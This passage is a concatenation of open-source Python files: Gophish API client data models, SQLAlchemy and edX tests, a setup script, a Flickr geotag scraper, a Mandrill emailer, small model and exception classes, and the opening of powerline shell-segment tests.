    def parse(cls, json):
        """Build a CampaignSummary from an API response dict."""
        summary = cls()
        for name, value in json.items():
            # TODO Add date parsing
            if name == 'stats':
                setattr(summary, name, Stat.parse(value))
            elif name in cls._valid_properties:
                setattr(summary, name, value)
        return summary
class Stat(Model):
    """Aggregate event counters (sent/opened/clicked/...) for a campaign."""

    _valid_properties = {
        'total': None,
        'sent': None,
        'opened': None,
        'clicked': None,
        'submitted_data': None,
        'error': None
    }

    def __init__(self):
        """Create an empty stat block with all counters defaulted."""
        for name, default in Stat._valid_properties.items():
            setattr(self, name, default)

    @classmethod
    def parse(cls, json):
        """Build a Stat from an API response dict, ignoring unknown keys."""
        stat = cls()
        for name in cls._valid_properties.keys() & json.keys():
            setattr(stat, name, json[name])
        return stat
class CampaignResults(Model):
    """Succinct view of a campaign: just results, status and timeline."""

    _valid_properties = {
        'id': None,
        'name': None,
        'results': [],
        'status': None,
        'timeline': [],
    }

    def __init__(self, **kwargs):
        """Create a results view, defaulting any property not in kwargs."""
        for name, default in CampaignResults._valid_properties.items():
            setattr(self, name, kwargs.get(name, default))

    @classmethod
    def parse(cls, json):
        """Build a CampaignResults from an API response dict."""
        view = cls()
        for name, value in json.items():
            # TODO Add date parsing
            if name == 'results':
                setattr(view, name, [Result.parse(r) for r in value])
            elif name == 'timeline':
                if value is not None:
                    setattr(view, name,
                            [TimelineEntry.parse(e) for e in value])
            elif name in cls._valid_properties:
                setattr(view, name, value)
        return view
class Result(Model):
    """Per-target outcome of a campaign (who, location, current status)."""

    _valid_properties = {
        'id': None,
        'first_name': None,
        'last_name': None,
        'email': None,
        'position': None,
        'ip': None,
        'latitude': None,
        'longitude': None,
        'status': None
    }

    def __init__(self, **kwargs):
        """Create a result, defaulting any property not in kwargs."""
        for name, default in Result._valid_properties.items():
            setattr(self, name, kwargs.get(name, default))

    @classmethod
    def parse(cls, json):
        """Build a Result from an API response dict, ignoring unknown keys."""
        result = cls()
        for name in cls._valid_properties.keys() & json.keys():
            setattr(result, name, json[name])
        return result
class TimelineEntry(Model):
    """A single campaign event (email sent, link clicked, ...)."""

    _valid_properties = {
        'email': None,
        'time': None,
        'message': None,
        'details': None
    }

    def __init__(self):
        """Create an empty timeline entry with all properties defaulted."""
        for name, default in TimelineEntry._valid_properties.items():
            setattr(self, name, default)

    @classmethod
    def parse(cls, json):
        """Build a TimelineEntry from an API response dict."""
        entry = cls()
        for name, value in json.items():
            if name == 'details' and value != "":
                # 'details' arrives as a JSON-encoded string; decode it.
                setattr(entry, name, _json.loads(value))
            elif name in cls._valid_properties:
                setattr(entry, name, value)
        return entry
class User(Model):
    """A member of a target group used in Gophish."""

    _valid_properties = {
        'id': None,
        'first_name': None,
        'last_name': None,
        'email': None,
        'position': None
    }

    def __init__(self, **kwargs):
        """Create a user, defaulting any property not in kwargs."""
        for name, default in User._valid_properties.items():
            setattr(self, name, kwargs.get(name, default))

    @classmethod
    def parse(cls, json):
        """Build a User from an API response dict, ignoring unknown keys."""
        user = cls()
        for name in cls._valid_properties.keys() & json.keys():
            setattr(user, name, json[name])
        return user
class Group(Model):
    """A named collection of target users."""

    _valid_properties = {
        'id': None,
        'name': None,
        'modified_date': datetime.now(tzlocal()),
        'targets': []
    }

    def __init__(self, **kwargs):
        """Create a group, defaulting any property not in kwargs."""
        for name, default in Group._valid_properties.items():
            setattr(self, name, kwargs.get(name, default))

    @classmethod
    def parse(cls, json):
        """Build a Group from an API response dict."""
        group = cls()
        for name, value in json.items():
            if name == 'targets':
                setattr(group, name, [User.parse(u) for u in value])
            elif name == 'modified_date':
                setattr(group, name, parse_date(value))
            elif name in cls._valid_properties:
                setattr(group, name, value)
        return group
class SMTP(Model):
    """A sending profile (SMTP relay configuration)."""

    _valid_properties = {
        'id': None,
        'interface_type': 'SMTP',
        'name': None,
        'host': None,
        'from_address': None,
        'ignore_cert_errors': False,
        'modified_date': datetime.now(tzlocal())
    }

    def __init__(self, **kwargs):
        """Create a sending profile, defaulting any property not in kwargs."""
        for name, default in SMTP._valid_properties.items():
            setattr(self, name, kwargs.get(name, default))

    @classmethod
    def parse(cls, json):
        """Build an SMTP profile from an API response dict."""
        smtp = cls()
        for name, value in json.items():
            if name == 'modified_date':
                setattr(smtp, name, parse_date(value))
            elif name in cls._valid_properties:
                setattr(smtp, name, value)
        return smtp
class Template(Model):
    """An email template, with optional file attachments."""

    _valid_properties = {
        'id': None,
        'name': None,
        'text': None,
        'html': None,
        'modified_date': datetime.now(tzlocal()),
        'subject': None,
        'attachments': []
    }

    def __init__(self, **kwargs):
        """Create a template, defaulting any property not in kwargs."""
        for name, default in Template._valid_properties.items():
            setattr(self, name, kwargs.get(name, default))

    @classmethod
    def parse(cls, json):
        """Build a Template from an API response dict."""
        template = cls()
        for name, value in json.items():
            if name == 'modified_date':
                setattr(template, name, parse_date(value))
            elif name == 'attachments':
                setattr(template, name,
                        [Attachment.parse(a) for a in value])
            elif name in cls._valid_properties:
                setattr(template, name, value)
        return template
class Page(Model):
    """A landing page, optionally capturing credentials/passwords."""

    _valid_properties = {
        'id': None,
        'name': None,
        'html': None,
        'modified_date': datetime.now(tzlocal()),
        'capture_credentials': False,
        'capture_passwords': False,
        'redirect_url': None
    }

    def __init__(self, **kwargs):
        """Create a page, defaulting any property not in kwargs."""
        for name, default in Page._valid_properties.items():
            setattr(self, name, kwargs.get(name, default))

    @classmethod
    def parse(cls, json):
        """Build a Page from an API response dict."""
        page = cls()
        for name, value in json.items():
            if name == 'modified_date':
                setattr(page, name, parse_date(value))
            elif name in cls._valid_properties:
                setattr(page, name, value)
        return page
class Attachment(Model):
    """A file attached to a template (content, MIME type, file name)."""

    _valid_properties = {'content': None, 'type': None, 'name': None}

    def __init__(self, **kwargs):
        """Create an attachment, defaulting any property not in kwargs.

        Fix: without this __init__ (matching the other models), the
        inherited Model.__init__ resets the *instance*
        ``_valid_properties`` to {}, so ``as_dict()`` always returned {}.
        """
        for key, default in Attachment._valid_properties.items():
            setattr(self, key, kwargs.get(key, default))

    @classmethod
    def parse(cls, json):
        """Build an Attachment from an API dict, ignoring unknown keys."""
        attachment = cls()
        for key, val in json.items():
            if key in cls._valid_properties:
                setattr(attachment, key, val)
        return attachment
class Error(Model):
    """An error envelope returned by the Gophish API."""

    # Fix: this was a *set* literal, unlike every other model's dict of
    # defaults; combined with the missing __init__ (Model.__init__ blanks
    # the instance _valid_properties), as_dict() always returned {} and
    # unparsed attributes were undefined.  `key in _valid_properties`
    # behaves the same for a dict as it did for the set.
    _valid_properties = {'message': None, 'success': None, 'data': None}

    def __init__(self, **kwargs):
        """Create an error, defaulting any property not in kwargs."""
        for key, default in Error._valid_properties.items():
            setattr(self, key, kwargs.get(key, default))

    @classmethod
    def parse(cls, json):
        """Build an Error from an API dict, ignoring unknown keys."""
        error = cls()
        for key, val in json.items():
            if key in cls._valid_properties:
                setattr(error, key, val)
        return error
| GoSecure/api-client-python | gophish/models.py | Python | mit | 11,653 |
# PYTHON_VERSION>=3.7
from __future__ import annotations
from dataclasses import dataclass
from dataclasses import field
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
from typing import TYPE_CHECKING
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy.orm import registry
from sqlalchemy.orm import relationship
# Single registry shared by both mapped dataclasses below; it owns the
# MetaData that their Table objects attach to.
mapper_registry: registry = registry()
@mapper_registry.mapped
@dataclass
class User:
    # Imperative-style mapping: the Table is declared explicitly and the
    # dataclass fields mirror its columns.
    __table__ = Table(
        "user",
        mapper_registry.metadata,
        Column("id", Integer, primary_key=True),
        Column("name", String(50)),
        Column("fullname", String(50)),
        Column("nickname", String(12)),
    )
    id: int = field(init=False)
    name: Optional[str] = None
    fullname: Optional[str] = None
    nickname: Optional[str] = None
    addresses: List[Address] = field(default_factory=list)
    if TYPE_CHECKING:
        # Workaround listing the mapped attributes for the mypy plugin,
        # since the decorator stack hides them from static analysis.
        _mypy_mapped_attrs = [id, name, fullname, nickname, addresses]
    __mapper_args__: Dict[str, Any] = {
        "properties": {"addresses": relationship("Address")}
    }
@mapper_registry.mapped
@dataclass
class Address:
    # Imperative-style mapping for the "address" table; ``user_id`` is a
    # foreign key back to ``user.id``.
    __table__ = Table(
        "address",
        mapper_registry.metadata,
        Column("id", Integer, primary_key=True),
        Column("user_id", Integer, ForeignKey("user.id")),
        Column("email_address", String(50)),
    )
    id: int = field(init=False)
    user_id: int = field(init=False)
    email_address: Optional[str] = None
    if TYPE_CHECKING:
        # Workaround listing the mapped attributes for the mypy plugin.
        _mypy_mapped_attrs = [id, user_id, email_address]
# Exercise typed Core expressions against the mapped classes; the second
# assignment deliberately rebinds ``stmt`` with a different select().
stmt = select(User.name).where(User.id.in_([1, 2, 3]))
stmt = select(Address).where(Address.email_address.contains(["foo"]))
| sqlalchemy/sqlalchemy | test/ext/mypy/plugin_files/dataclasses_workaround.py | Python | mit | 1,848 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
from setuptools import setup
from setuptools import find_packages
from docs import getVersion
# Variables ===================================================================
def _read(path):
    """Return the full text of *path*, closing the file promptly.

    The previous ``open(path).read()`` pattern leaked file handles
    (relying on GC to close them); ``with`` closes deterministically.
    """
    with open(path) as handle:
        return handle.read()


CHANGELOG = _read('CHANGELOG.rst')
LONG_DESCRIPTION = "\n\n".join([
    _read('README.rst'),
    _read('CONTRIBUTORS.rst'),
    CHANGELOG
])
# Actual setup definition =====================================================
setup(
    name='wa-kat',
    version=getVersion(CHANGELOG),
    description="Web page analyzator for czech webarchive.",
    long_description=LONG_DESCRIPTION,
    url='https://github.com/WebArchivCZ/WA-KAT',
    author='Bystroushaak',
    author_email='bystrousak@kitakitsune.org',
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2.7",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
    ],
    license='MIT',
    packages=find_packages('src'),
    package_dir={'': 'src'},
    include_package_data=True,
    zip_safe=False,
    scripts=[
        "bin/wa_kat_server.py",
        "bin/wa_kat_build_conspects.py",
        "bin/wa_kat_structured_logger.py",
        "bin/wa_kat_build_keyword_index.py",
    ],
    install_requires=_read("requirements.txt").splitlines(),
    extras_require={
        "test": [
            "pytest",
        ],
        "docs": [
            "sphinx",
            "sphinxcontrib-napoleon",
        ]
    }
)
| WebArchivCZ/WA-KAT | setup.py | Python | mit | 1,679 |
import unittest
import decimal
import ddt
from mock import patch
from django.conf import settings
from django.test.utils import override_settings
from django.core.urlresolvers import reverse
from xmodule.modulestore.tests.django_utils import (
ModuleStoreTestCase, mixed_store_config
)
from util.testing import UrlResetMixin
from xmodule.modulestore.tests.factories import CourseFactory
from course_modes.tests.factories import CourseModeFactory
from student.tests.factories import CourseEnrollmentFactory, UserFactory
from student.models import CourseEnrollment
from course_modes.models import CourseMode, Mode
# Since we don't need any XML course fixtures, use a modulestore configuration
# that disables the XML modulestore.
# (Applied to every test class in this module via @override_settings.)
MODULESTORE_CONFIG = mixed_store_config(settings.COMMON_TEST_DATA_ROOT, {}, include_xml=False)
@ddt.ddt
@override_settings(MODULESTORE=MODULESTORE_CONFIG)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
class CourseModeViewTest(UrlResetMixin, ModuleStoreTestCase):
    """Tests for the course mode ("track") selection and creation views."""
    @patch.dict(settings.FEATURES, {'MODE_CREATION_FOR_TESTING': True})
    def setUp(self):
        """Create a course and a logged-in user for every test."""
        super(CourseModeViewTest, self).setUp('course_modes.urls')
        self.course = CourseFactory.create()
        self.user = UserFactory.create(username="Bob", email="bob@example.com", password="edx")
        self.client.login(username=self.user.username, password="edx")
    @unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
    @ddt.data(
        # is_active?, enrollment_mode, redirect?
        (True, 'verified', True),
        (True, 'honor', False),
        (True, 'audit', False),
        (False, 'verified', False),
        (False, 'honor', False),
        (False, 'audit', False),
        (False, None, False),
    )
    @ddt.unpack
    def test_redirect_to_dashboard(self, is_active, enrollment_mode, redirect):
        """Only an active verified enrollment redirects to the dashboard."""
        # Create the course modes
        for mode in ('audit', 'honor', 'verified'):
            CourseModeFactory(mode_slug=mode, course_id=self.course.id)
        # Enroll the user in the test course
        if enrollment_mode is not None:
            CourseEnrollmentFactory(
                is_active=is_active,
                mode=enrollment_mode,
                course_id=self.course.id,
                user=self.user
            )
        # Configure whether we're upgrading or not
        url = reverse('course_modes_choose', args=[unicode(self.course.id)])
        response = self.client.get(url)
        # Check whether we were correctly redirected
        if redirect:
            self.assertRedirects(response, reverse('dashboard'))
        else:
            self.assertEquals(response.status_code, 200)
    def test_upgrade_copy(self):
        """The upgrade querystring switches the page to upgrade wording."""
        # Create the course modes
        for mode in ('audit', 'honor', 'verified'):
            CourseModeFactory(mode_slug=mode, course_id=self.course.id)
        url = reverse('course_modes_choose', args=[unicode(self.course.id)])
        response = self.client.get(url, {"upgrade": True})
        # Verify that the upgrade copy is displayed instead
        # of the usual text.
        self.assertContains(response, "Upgrade Your Enrollment")
    def test_no_enrollment(self):
        """The page renders even for a user who never enrolled."""
        # Create the course modes
        for mode in ('audit', 'honor', 'verified'):
            CourseModeFactory(mode_slug=mode, course_id=self.course.id)
        # User visits the track selection page directly without ever enrolling
        url = reverse('course_modes_choose', args=[unicode(self.course.id)])
        response = self.client.get(url)
        self.assertEquals(response.status_code, 200)
    @ddt.data(
        '',
        '1,,2',
        '1, ,2',
        '1, 2, 3'
    )
    def test_suggested_prices(self, price_list):
        """Malformed or spaced suggested-price lists must not break the page."""
        # Create the course modes
        for mode in ('audit', 'honor'):
            CourseModeFactory(mode_slug=mode, course_id=self.course.id)
        CourseModeFactory(
            mode_slug='verified',
            course_id=self.course.id,
            suggested_prices=price_list
        )
        # Enroll the user in the test course to emulate
        # automatic enrollment
        CourseEnrollmentFactory(
            is_active=True,
            course_id=self.course.id,
            user=self.user
        )
        # Verify that the prices render correctly
        response = self.client.get(
            reverse('course_modes_choose', args=[unicode(self.course.id)]),
            follow=False,
        )
        self.assertEquals(response.status_code, 200)
        # TODO: Fix it so that response.templates works w/ mako templates, and then assert
        # that the right template rendered
    def test_professional_enrollment(self):
        """Professional-only courses skip track selection entirely."""
        # The only course mode is professional ed
        CourseModeFactory(mode_slug='professional', course_id=self.course.id)
        # Go to the "choose your track" page
        choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
        response = self.client.get(choose_track_url)
        # Expect that we're redirected immediately to the "show requirements" page
        # (since the only available track is professional ed)
        show_reqs_url = reverse('verify_student_show_requirements', args=[unicode(self.course.id)])
        self.assertRedirects(response, show_reqs_url)
        # Now enroll in the course
        CourseEnrollmentFactory(
            user=self.user,
            is_active=True,
            mode="professional",
            course_id=unicode(self.course.id),
        )
        # Expect that this time we're redirected to the dashboard (since we're already registered)
        response = self.client.get(choose_track_url)
        self.assertRedirects(response, reverse('dashboard'))
    # Mapping of course modes to the POST parameters sent
    # when the user chooses that mode.
    POST_PARAMS_FOR_COURSE_MODE = {
        'honor': {'honor_mode': True},
        'verified': {'verified_mode': True, 'contribution': '1.23'},
        'unsupported': {'unsupported_mode': True},
    }
    @ddt.data(
        ('honor', 'dashboard'),
        ('verified', 'show_requirements'),
    )
    @ddt.unpack
    def test_choose_mode_redirect(self, course_mode, expected_redirect):
        """Choosing a mode redirects to the page appropriate for that mode."""
        # Create the course modes
        for mode in ('audit', 'honor', 'verified'):
            CourseModeFactory(mode_slug=mode, course_id=self.course.id)
        # Choose the mode (POST request)
        choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
        response = self.client.post(choose_track_url, self.POST_PARAMS_FOR_COURSE_MODE[course_mode])
        # Verify the redirect
        if expected_redirect == 'dashboard':
            redirect_url = reverse('dashboard')
        elif expected_redirect == 'show_requirements':
            redirect_url = reverse(
                'verify_student_show_requirements',
                kwargs={'course_id': unicode(self.course.id)}
            ) + "?upgrade=False"
        else:
            self.fail("Must provide a valid redirect URL name")
        self.assertRedirects(response, redirect_url)
    def test_remember_donation_for_course(self):
        """The verified-track contribution amount is stored in the session."""
        # Create the course modes
        for mode in ('honor', 'verified'):
            CourseModeFactory(mode_slug=mode, course_id=self.course.id)
        # Choose the mode (POST request)
        choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
        self.client.post(choose_track_url, self.POST_PARAMS_FOR_COURSE_MODE['verified'])
        # Expect that the contribution amount is stored in the user's session
        self.assertIn('donation_for_course', self.client.session)
        self.assertIn(unicode(self.course.id), self.client.session['donation_for_course'])
        actual_amount = self.client.session['donation_for_course'][unicode(self.course.id)]
        expected_amount = decimal.Decimal(self.POST_PARAMS_FOR_COURSE_MODE['verified']['contribution'])
        self.assertEqual(actual_amount, expected_amount)
    def test_successful_honor_enrollment(self):
        """Explicitly choosing honor keeps an existing honor enrollment active."""
        # Create the course modes
        for mode in ('honor', 'verified'):
            CourseModeFactory(mode_slug=mode, course_id=self.course.id)
        # Enroll the user in the default mode (honor) to emulate
        # automatic enrollment
        params = {
            'enrollment_action': 'enroll',
            'course_id': unicode(self.course.id)
        }
        self.client.post(reverse('change_enrollment'), params)
        # Explicitly select the honor mode (POST request)
        choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
        self.client.post(choose_track_url, self.POST_PARAMS_FOR_COURSE_MODE['honor'])
        # Verify that the user's enrollment remains unchanged
        mode, is_active = CourseEnrollment.enrollment_mode_for_user(self.user, self.course.id)
        self.assertEqual(mode, 'honor')
        self.assertEqual(is_active, True)
    def test_unsupported_enrollment_mode_failure(self):
        """Posting a mode the course does not offer returns HTTP 400."""
        # Create the supported course modes
        for mode in ('honor', 'verified'):
            CourseModeFactory(mode_slug=mode, course_id=self.course.id)
        # Choose an unsupported mode (POST request)
        choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
        response = self.client.post(choose_track_url, self.POST_PARAMS_FOR_COURSE_MODE['unsupported'])
        self.assertEqual(400, response.status_code)
    @unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
    def test_default_mode_creation(self):
        """The mode-creation endpoint defaults to a free honor mode."""
        # Hit the mode creation endpoint with no querystring params, to create an honor mode
        url = reverse('create_mode', args=[unicode(self.course.id)])
        response = self.client.get(url)
        self.assertEquals(response.status_code, 200)
        expected_mode = [Mode(u'honor', u'Honor Code Certificate', 0, '', 'usd', None, None)]
        course_mode = CourseMode.modes_for_course(self.course.id)
        self.assertEquals(course_mode, expected_mode)
    @unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
    @ddt.data(
        (u'verified', u'Verified Certificate', 10, '10,20,30', 'usd'),
        (u'professional', u'Professional Education', 100, '100,200', 'usd'),
    )
    @ddt.unpack
    def test_verified_mode_creation(self, mode_slug, mode_display_name, min_price, suggested_prices, currency):
        """The mode-creation endpoint honors explicit querystring parameters."""
        parameters = {}
        parameters['mode_slug'] = mode_slug
        parameters['mode_display_name'] = mode_display_name
        parameters['min_price'] = min_price
        parameters['suggested_prices'] = suggested_prices
        parameters['currency'] = currency
        url = reverse('create_mode', args=[unicode(self.course.id)])
        response = self.client.get(url, parameters)
        self.assertEquals(response.status_code, 200)
        expected_mode = [Mode(mode_slug, mode_display_name, min_price, suggested_prices, currency, None, None)]
        course_mode = CourseMode.modes_for_course(self.course.id)
        self.assertEquals(course_mode, expected_mode)
    @unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
    def test_multiple_mode_creation(self):
        """Multiple calls accumulate modes, with defaults filling any gaps."""
        # Create an honor mode
        base_url = reverse('create_mode', args=[unicode(self.course.id)])
        self.client.get(base_url)
        # Excluding the currency parameter implicitly tests the mode creation endpoint's ability to
        # use default values when parameters are partially missing.
        parameters = {}
        parameters['mode_slug'] = u'verified'
        parameters['mode_display_name'] = u'Verified Certificate'
        parameters['min_price'] = 10
        parameters['suggested_prices'] = '10,20'
        # Create a verified mode
        url = reverse('create_mode', args=[unicode(self.course.id)])
        response = self.client.get(url, parameters)
        honor_mode = Mode(u'honor', u'Honor Code Certificate', 0, '', 'usd', None, None)
        verified_mode = Mode(u'verified', u'Verified Certificate', 10, '10,20', 'usd', None, None)
        expected_modes = [honor_mode, verified_mode]
        course_modes = CourseMode.modes_for_course(self.course.id)
        self.assertEquals(course_modes, expected_modes)
| olexiim/edx-platform | common/djangoapps/course_modes/tests/test_views.py | Python | agpl-3.0 | 12,383 |
import flickrapi
import json
import csv
from datetime import date, timedelta
# Flickr API credentials -- replace the placeholders before running.
api_key = 'API-KEY'
api_secret = 'SECRET-KEY'
# Destination file for the scraped photo records.
csv_path = 'flickr_helsinki.csv'
class Image:
    """A geotagged Flickr photo, with an optional static-image URL."""

    def __init__(self, photo_id, lat, lon):
        # Coordinates arrive as strings from the API; stored as-is.
        self.photo_id, self.lat, self.lon = photo_id, lat, lon
        self.url = ''

    def setImageUrl(self, url):
        """Record the direct URL of the photo."""
        self.url = url
# Python 2 script: mixes print statements and parenthesized prints.
flickr = flickrapi.FlickrAPI(api_key, api_secret)
# Bounding box (min_lon,min_lat,max_lon,max_lat) covering central Helsinki.
bbox = '24.899319,60.150223,24.986683,60.177915'
photos = []
count = 0
# Only photos taken within the last 90 days.
d = date.today() - timedelta(days=90)
#first get a count
# NOTE(review): the API is walked twice (once just to count, once to
# collect) -- consider collecting during the counting pass.
print('Working...')
for photo in flickr.walk(tag_mode='all',bbox=bbox, min_taken_date=d, extras='geo'):
    count = count+1
    if count%10 == 0:
        print '.',
print('\n' + str(count) + ' images found, processing...')
count = 1
for photo in flickr.walk(tag_mode='all', bbox=bbox, min_taken_date=d, extras='geo'):
    print(str(count)),
    count = count+1
    img = Image(photo.get('id'), photo.get('latitude'), photo.get('longitude'))
    # construct url
    img.setImageUrl('https://farm' + photo.get('farm') + '.staticflickr.com/' + photo.get('server') + '/' + photo.get('id') + '_' + photo.get('secret') + '_z.jpg')
    photos.append(img)
print('Writing to csv')
# output to csv
with open(csv_path, 'w') as csvfile:
    fieldnames = ['photo_id', 'lat', 'lon', 'url']
    wr = csv.DictWriter(csvfile, fieldnames=fieldnames, quoting=csv.QUOTE_NONNUMERIC, lineterminator='\n')
    wr.writeheader()
    for photo in photos:
        wr.writerow({'photo_id': photo.photo_id, 'lat': photo.lat, 'lon': photo.lon, 'url': photo.url})
| jlevente/link-vgi | workshop/case_study/flickr.py | Python | gpl-3.0 | 1,576 |
import mandrill
import os
import logging
import jinja2
from totalimpactwebapp.testing import is_test_email
# Module-level logger for outbound email activity.
logger = logging.getLogger("ti.emailer")
def send(address, subject, template_name, context):
    """Render ``template_name`` with ``context`` and email it via Mandrill.

    Returns the message dict that was sent, or ``False`` when *address*
    is a test address (no mail is sent in that case).
    """
    # Never deliver real mail to test addresses.
    if is_test_email(address):
        return False

    loader = jinja2.FileSystemLoader(searchpath="totalimpactwebapp/templates")
    env = jinja2.Environment(loader=loader)
    html_to_send = env.get_template(template_name + ".html").render(context)

    mailer = mandrill.Mandrill(os.getenv("MANDRILL_APIKEY"))

    addressee = {"email": address}
    if "name" in context:
        addressee["name"] = context["name"]

    msg = {
        "html": html_to_send,
        "subject": subject,
        "from_email": "team@impactstory.org",
        "from_name": "The Impactstory team",
        "to": [addressee],  # must be a list
        "track_opens": True,
        "track_clicks": True
    }
    if "tags" in context:
        msg["tags"] = context["tags"]

    mailer.messages.send(msg)
    logger.info(u"Sent an email to " + address)
    return msg
| Impactstory/total-impact-webapp | emailer.py | Python | mit | 1,160 |
# Copyright 2018 WolkAbout Technology s.r.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
ActuatorStatus Module.
"""
class ActuatorStatus:
    """Snapshot of a single actuator: its reference, state and value."""

    def __init__(self, reference, state, value):
        """
        Store an actuator status snapshot.

        :param reference: reference of the actuator
        :type reference: str
        :param state: current state of the actuator
        :type state: wolk.models.ActuatorState.ActuatorState
        :param value: current value of the actuator
        :type value: int or float or str
        """
        self.reference, self.state, self.value = reference, state, value
| Wolkabout/WolkConnect-Python- | wolk/models/ActuatorStatus.py | Python | apache-2.0 | 1,190 |
from wikipediabase.util import get_article
def sort_by_length(*args):
    """Return the article names ordered by total paragraph length, longest first."""
    def total_length(name):
        return len(' '.join(get_article(name).paragraphs()))
    return sorted(args, key=total_length, reverse=True)
def sort_named(named, *args):
    """Sort article names: exact matches of *named* first, then
    case-insensitive matches, then by ascending article length.

    Names whose article cannot be fetched are dropped. The original
    implementation used a ``cmp=`` comparator, which only exists in
    Python 2; the equivalent key tuple below works on both 2 and 3.
    """
    article_lengths = {}
    for name in args:
        try:
            article_lengths[name] = len(' '.join(get_article(name).paragraphs()))
        except LookupError:
            pass

    def rank(name):
        # False sorts before True: exact matches first, then
        # case-insensitive matches, then shorter articles.
        return (name != named,
                name.lower() != named.lower(),
                article_lengths[name])

    return sorted(article_lengths, key=rank)
| fakedrake/WikipediaBase | wikipediabase/sort_symbols.py | Python | apache-2.0 | 1,035 |
# -*- coding: utf-8 -*-
#
# This file is part of EUDAT B2Share.
# Copyright (C) 2016 CERN.
#
# B2Share is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# B2Share is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with B2Share; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""B2Share Communities exceptions."""
from __future__ import absolute_import
from invenio_rest.errors import RESTException
class InvalidCommunityError(Exception):
    """Raised when a community fails validation."""
class CommunityDoesNotExistError(Exception):
    """Raised when the requested community cannot be found."""
class CommunityDeletedError(Exception):
    """Raised when the requested community is marked as deleted."""
class InvalidPublicationStateError(RESTException):
    """Raised when a deposit is in an invalid publication state."""

    # HTTP status code returned to the client.
    code = 400
class NotACommunityRoleError(RESTException):
    """Raised when a role does not belong to any community."""

    # HTTP status code and human-readable message for the client.
    code = 400
    description = 'This role doesn\'t belong to any community.'
| emanueldima/b2share | b2share/modules/communities/errors.py | Python | gpl-2.0 | 1,826 |
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import sys
import os
from functools import partial
from collections import namedtuple
from time import sleep
from powerline.segments import shell, tmux, pdb, i3wm
from powerline.lib.vcs import get_fallback_create_watcher
from powerline.lib.unicode import out_u
import tests.vim as vim_module
from tests.lib import Args, urllib_read, replace_attr, new_module, replace_module_module, replace_env, Pl
from tests import TestCase, SkipTest
def get_dummy_guess(**kwargs):
	'''Return a fake VCS ``guess`` whose branch is the path basename.

	Extra keyword arguments are forwarded onto the returned Args; a
	``directory`` default of the guessed path is supplied unless the
	caller provided one.
	'''
	directory_known = 'directory' in kwargs

	def guess(path, create_watcher):
		extra = kwargs if directory_known else dict(kwargs, directory=path)
		return Args(branch=lambda: out_u(os.path.basename(path)), **extra)

	return guess
class TestShell(TestCase):
	'''Tests for the segments in powerline.segments.shell.'''
	def test_last_status(self):
		'''last_status highlights failures and hides successful exits.'''
		pl = Pl()
		segment_info = {'args': Args(last_exit_code=10)}
		self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), [
			{'contents': '10', 'highlight_groups': ['exit_fail']}
		])
		segment_info['args'].last_exit_code = 0
		self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), None)
		segment_info['args'].last_exit_code = None
		self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), None)
		segment_info['args'].last_exit_code = 'sigsegv'
		self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), [
			{'contents': 'sigsegv', 'highlight_groups': ['exit_fail']}
		])
		segment_info['args'].last_exit_code = 'sigsegv+core'
		self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), [
			{'contents': 'sigsegv+core', 'highlight_groups': ['exit_fail']}
		])
	def test_last_pipe_status(self):
		'''last_pipe_status emits one segment per pipeline member.'''
		pl = Pl()
		segment_info = {'args': Args(last_pipe_status=[])}
		self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), None)
		segment_info['args'].last_pipe_status = [0, 0, 0]
		self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), None)
		segment_info['args'].last_pipe_status = [0, 2, 0]
		self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), [
			{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True},
			{'contents': '2', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True},
			{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True}
		])
		segment_info['args'].last_pipe_status = [0, 'sigsegv', 'sigsegv+core']
		self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), [
			{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True},
			{'contents': 'sigsegv', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True},
